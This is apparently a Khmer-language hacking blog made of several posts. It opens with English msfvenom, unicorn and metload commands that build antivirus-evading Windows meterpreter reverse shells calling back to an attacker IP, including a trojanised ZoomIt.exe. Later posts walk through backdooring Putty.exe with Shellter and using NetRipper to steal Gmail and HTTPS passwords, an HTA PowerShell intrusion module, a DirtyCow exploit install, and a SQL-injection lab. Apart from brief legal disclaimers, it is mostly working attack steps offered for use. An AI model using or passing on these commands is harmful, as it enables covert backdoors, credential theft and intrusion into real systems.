Basic Anti-Virus Bypass Techniques

Basic Anti-Virus bypass techniques: msfvenom, veil-evasion, shellter, unicorn and metload (private)

msfencode (part of metasploit framework)
--------------------
msfvenom -l encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.52.211 LPORT=443 -f exe -o rev_tcp_211_442.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.52.211 LPORT=443 -e x86/shikata_ga_nai -i 11 -x ZoomIt.exe -f exe -o rev_tcp_shikata_211_443.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.52.211 LPORT=443 -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13  -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 6 -f exe  -x ZoomIt.exe -o rev_tcp_multiple_211_443.exe


veil-evasion
---------------------
c/meterpreter
python/meterpreter



shellter
-------------
auto & buitlin meterpreter payload

auto & custom multi encode meterpreter payload

unicorn
-------------
./unicorn.py windows/meterpreter/reverse_tcp 172.16.52.211 443 macro
Auto_Open()

metload
-------------
./autometload.py 2 172.16.52.211 443

តោះតំឡើង sqlite-lab សំរាប់ធ្វើតេស្ត SQL Injection Web application

SQL Injection ក្នុង​ Lab នេះមាន ៣ ប្រភេទគឺ៖

1. Union based SQL Injection (numaric based)
2. Union based SQL Injection (String based)
3. Boolean based Blind SQL Injection

តោះធ្វើការទាញយកនិងតំឡើង នៅក្នុង Video ខាងក្រោមខ្ញុំប្រើ Kali Linux

Download sqlite-lab

git clone https://github.com/incredibleindishell/sqlite-lab.git
apt-get install php5-sqlite

Download PDF File

ខាងក្រោមនេះជា វីដេអូ(Video)បង្ហាញពីការតំឡើងក្នុង​ Kali Linux

វីដេអូមេរៀន Penetration Testing and Ethical Hacking

មិនងាយនោះទេដែលមាន ការបង្រៀនដោយមិនគិតថ្លៃបែបនេះ, សំរាប់អ្នកដែលចង់ក្លាយទៅជា penetration tester, នេះគឺជាឱកាសដើម្បីរៀនជាមួយនិងវគ្គបង្រៀនដោយមិនគិតថ្លៃសិក្សារ Free Course

តម្រូវការសមត្ថភាពសំរាប់​ Hacker ក្រមសិលធម៏(ethical hackers)  គឺតម្រូវការជាសាកល, Hacker ក្រមសិលធម៏ គឺត្រូវបានហៅថា "White-hat Hacker" គឺជា Hacker ដែល ធ្វើការវាយលុកទៅក្នុង secured systems ដើម្បីបង្ហាញនូវគុណវិបត្តិនៃចំនុចខ្សោយរបស់ System​ ។ ពួកគេជួយទី​ភ្នាក់​ងារ​រដ្ឋា​ភិ​បាល, អាជីវកម្មឯកជន, អង្គការសាធារណៈ គឺដើម្បី កំណត់អត្តសញ្ញាណទៅលើប្រព័ន្ធប្រតិបត្តការ ណាដែលមានសុវត្តិភាព និងអ្វីដែលគួរតែធ្វើការកំណែរទំរង់ ។ បើអ្នកចង់ចេះ Hacking រឺ Penetration Testing ជាជំនាញរបស់អ្នកនេះគឺជាមេរៀនសំរាប់អ្នក,

គោលបំណងនៃមេរៀនត្រូវបានរួមបញ្ចូលដូចជា៖

• Intrusion Detection
• Policy Creation
• Social Engineering
• DDoS Attacks
• Buffer Overflows
• Virus Creation

សរុបទៅមានរយះពេល 13ម៉ោង និង 26​​នាទី

សូមធ្វើការទាញយកនៅទីនេះ

ការស្វែងយល់ពី Metasploit Framework សំរាប់ Penetration Tester

msfconsole ប្រហែលជាមានភាពពេញនិយមខ្លាំងទៅលើផ្នែក Interface របស់ Mestasploit Framework (MSF)​ ។ មុខងារជាច្រើនគឺត្រូវបានដាក់រួមបញ្ចូលគ្នាតែមួយ(all-in-one)

ចំនុចកណ្តាលនៅក្នុង Console និងអនុញ្ញាតឱ្យអ្នកមានលទ្ធភាពចូលដំណើរការស្ទើរតែទាំងអស់នៃជម្រើសដែលមាននៅក្នុង MSF ។
msfconsole និងឃើញនៅតំបូងគេព្រោះវាជាការតំណើរការរបស់ Metasploit Framework, ប៉ុន្តែអ្វីដែលអ្នកត្រូវរៀនតំបូងនោះគឺ Syntax នៃ Commands អ្នកនិងពេញចិត្តនែការប្រើប្រាស់ជាលន្ខណះ Interface ។

ជាមួយនិង​ msfconsole, អ្នកអាចធ្វើការ Access ចូលនិង អាចប្រើប្រាស់នូវរាល់ Plugin,Payload, និងប្រើប្រាស់  Exploit Module, Post Module និងរឿងជាច្រើនទៀត​។
MSFCONSOLE Interface អាចធ្វើការរួមបញ្ចូលជាមួយ Third-party Programs បានយ៉ាងល្អទៀតផង, ដួចជា nmap, sqlmap​ -ល-, និងអាចប្រើប្រាស់ដោយផ្ទាល់នៃខាងក្នុងរបស់ msfconsole​ ។

• ដើម្បីចាប់ផ្ដើមតំណើរការ MSFCONSOEL យើងគ្រាន់តែវានូវ msfconsole នៅក្នុង Command prompt របស់ Termina

ពេលដែល msfconsole ចាប់ផ្ដើម, យើងអាចធ្វើការចូលមើលរាល់ exploits modules, auxiliary modules; all payloads ដែលមាននៅក្នុង Metasploit-Framework

• នៅក្នុង Msfconsole គឺមានជំនួយ(help)ពីរប្រភេទ:

• msfconsole -h -- គឺធ្វើការបង្ហាញនៃការចាប់ផ្ដើមរបស់ msfconsole

• msfconsole -help -- គឺប្រើប្ររាស់ពេលបន្ទាប់ពីយើងចូលទៅក្នុង msfconsole display(msf>)

ប៉ារ៉ាម៉ែត្រ MSFCONSOLE

• banner --​ គឺការបង្ហាញនូវព័ត៌មានតំណែរទម្រង់ និងធ្វើការបង្ហាញនូវរាល់ Module ទាំងអស់

• back — ប្រើសំរាប់ថយក្រោយតំណើរការវិញ

• check -- module ជាច្រើនដែលមិនតំណើរការជាមួយ​ប៉ារាមែត្រនេះ

• connect -- ប្រើដើម្បី Remote Connection ទៅ Host

• Edit -- គឺធ្វើការកំណែរទំរង់នូវ module ដែលយើងកំពង់ប្រើប្រាស់

• irb -- គឺជា Script mode គឺសំរាប់ execute commands ដើម្បីបង្កើតនូវ script

• resource -- តំណើរការទៅលើ File, ទៅលើTools មួយចំនួន ដូចជា Karmetasploit គឺត្រូវការប៉ារ៉ាម៉ែត្រនេះ

• search -- គឺស្វែងរក module ណាមួយដែលយើងចង់ប្រើប្រាស់

• use -- គឺការប្រើប្រាស់នូវ module

• show -- គឺធ្វើការបង្ហាញនូវរាល់ payload,modules,post modules,plugins និងច្រើនទៀត

ការប្រើប្រាស់ Shellter + Metasploit + NetRipper ដើម្បីចាប់យក HTTPS Password

Shellter គឺជា dynamic shellcode injection tool, ងាយស្រួលក្នុងការ Inject ក្នុង windows System, ហើយវាបង្កើតមកតាមរយះ Framework ដូចជា Metasploit Framework ។ ការប្រើប្រាស់ API Hacking ដើម្បីចាប់យក Traffic របស់​ Network ហើយអាចចាប់យក Traffic
ទាំងមុន Encryption និង បន្ទាប់ពី Decryption, Shellter គឺបានធ្វើការបង្ហាញដំបូងគេ នៅក្នុង Defcon 23 នៅលាស្វេហ្គាស ។
មុននិង Shellter ដំណើរការជាមួួយ Metasploit ចូរធ្វើតាមវីធីដូចខាងក្រោយ 
របៀបតំឡើង​ NetRipper ក្នុង Kali Linux  ៖
ធ្វើការទាញយក  NetRipper

root@kali:~/Desktop# git clone https://github.com/NytroRST/NetRipper.git

root@kali:~/Desktop# cd NetRipper/Metasploit/

root@kali:~/Desktop/NetRipper/Metasploit# cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/

root@kali:~/Desktop/NetRipper/Metasploit# mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper

root@kali:~/Desktop/NetRipper/Metasploit# g++ -Wall netripper.cpp -o netripper

root@kali:~/Desktop/NetRipper/Metasploit# cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

root@kali:~/Desktop/NetRipper/Metasploit# cd ../Release/

root@kali:~/Desktop/NetRipper/Release# cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/

ការបង្ហើត FUD payload ជាមួយនិង Shellter

១. ទាញយក NetRipper ជាមុនរួចហើយ Let's go

២. ជ្រើសរើសយកមុខងាណាមួយ [executable file ធ្វើជា backdoor], រូបខាងក្រោមយើងយក Putty.exe មកសាកល្បង

៣. ធ្វើការ Config payload និង កំណែរទំរង់ LHOST និង LPORT 
-LHOST គឺជា IP របស់របស់ Attacker
-LPORT ចង់អោយ តំណើរការនៅ Port មួយណា

៤. ចាប់ផ្ដើមតំណើរការ Metasploit ដោយសរសេរ msfconsole ក្នុង Terminal

៥. ប្រើវិធីដើម្បីផ្ញើរ File-Backdoor ដែលបានបង្កើតជាមួយ NetRipper ខាងលើ

៦. រួចចូរដំណើរការ /post/windows/gather/netripper ដើម្បីធ្វើការ Inject នៅ Process

៧. ដល់ពេលចូលទៅក្នុង Folder/File ដែលធ្វើការរក្សារទុកនូវទិន្នន័យ រួចធ្វើការទាញយក

៨. ពេលនេះយើងអាទាញយក File ដែលធ្វើការរក្សានូវទិន្នន័យទាំងនោះបានហើយក៏ដូចជាយើងអាចយក Gmail និង Password ផ្សេងៗបានផងដែរ (រួបបញ្ចូលទាំង HTTPS traffic)

គ្រប់យ៉ាង ជាការទ្វេសប្រហែស សូមមានការប្រុងប្រយ័ត្នខ្ពស់

ខាងក្រោយនេះជាការបង្ហាញ ៖
 
សូមទទួលយកជាការយល់ដឹង និងការប្រុងប្រយ័ត្ន

នេះគ្រាន់តែជាការបង្ហាញជាការយល់ដឹង 
សូមកុំយកទៅប្រព្រឹត្តក្នុងករណីខុសច្បាប់យើងនិងមិនទទួលខុសត្រូវឡើយ ៕

ការច្រៀតចូលទៅកាន់ Windows ដោយប្រើប្រាស់ PowerShell Attack

use exploit/windows/misc/hta_server

មុខថានេះគឺប្រើជាលក្ខណះ Host គឺ HTML Application(HTA) ដោយវានិងបើកអោយ Attacker ចូលនៅពេលដែល Payload ដំណើរការតាមរយះ PowerShell ។
ពេលដែលអ្នកប្រើប្រាស់ ធ្វើការចូលទៅកាន់ HTA file វានិងលោត Promt មួយដោយអោយធ្វើការ Run វា មុននិង Payload Executed ។

មើលវីដេអូការបង្ហាញនៅខាងក្រោម ៖



អគុណសំរាប់ការចូលមកទស្សនា

នេះគ្រាន់តែជាការបង្ហាញជាការយល់ដឹង 
សូមកុំយកទៅប្រព្រឹត្តក្នុងករណីខុសច្បាប់យើងនិងមិនទទួលខុសត្រូវឡើយ ៕

DirtyCow Exploit​ មានវត្តមាន​ក្នុង Metasploit ហើយ

សួរស្ដីអ្នកទាំងអស់គ្នា​, យើងចាប់ផ្ដើមនិយាយអំពី Linux វិញ ។ ហើយថ្ងៃនេះដែរខ្ញុំចង់ចែករំលែកនូវទិចនិចជាមួយនិង Dirty Cow Vulnerability, ដែលបានសរសេរឡើងដោយ​ Ruby Programming Language ហើយត្រូវបានបង្កើតជាប់ជាមួយនិង Metasploit Project ។

សូមធ្វើការទាញយកតាមតំណរនេះ​ DirtyCow-Exploit សូមកុំភ្លេចធ្វើការចែករំលែកផង :) 

របៀបនៃការប្រើប្រាស់ ៖

១. សូមចូលទាញយកតាមតំណរ ដែលបានអោយនៅខាងលើ 
២.​ ចូលធ្វើការបន្លារ Zip File រួចដាកើនៅក្នុង Desktop

៣. បន្ទាប់ចូលទៅកាន់ទីតាំងដើមរបស់ Metasploit Project (ទីតាំង Computer របស់ខ្ញុំ​:/usr/share/metasploit-framework)

៤. បន្ទាប់ចូលទៅកាន់ទីតាំង /usr/share/metasploit-framework/modules/exploits/linux/local/
៥. រួចចូលធ្វការ Copy Exploit File ដែលនៅក្នុង Desktop( DirtyCow.rb ) ដាក់ចូលទៅក្នុងទីតាំងដែលបានប្រាប់នៅជំហ៊ានទី ៤ ដូចដែលបានប្រាប់ 
៦. អ្វីគ្រប់យ៉ាងគឺរួចរាល់ 
៧. ដល់ពេលដែលត្រូវបើក Terminal របស់អ្នកហើយ
៨. ចូរធ្វើការបើក MetaSploit រឺ Armitage រឺ Cobalt Strike
៩. msfconsole: ស្វែងរក dirtycow
១០. ជាការបញ្ចប់អ្នកអាប្រើវាក្នុងការ​ Exploit បានហើយ យេ......យេ

សូមអគុណសំរាប់ការចូលមកាន់គេហទំព័ររបស់យើង សូមធ្វើការ
Like និង Share ដើម្បីជាការលើកទឹកចិត្ត​ រឺមានជាចម្ងល់អាចដាក់ជា Comment នៅខាក្រោមបាន ។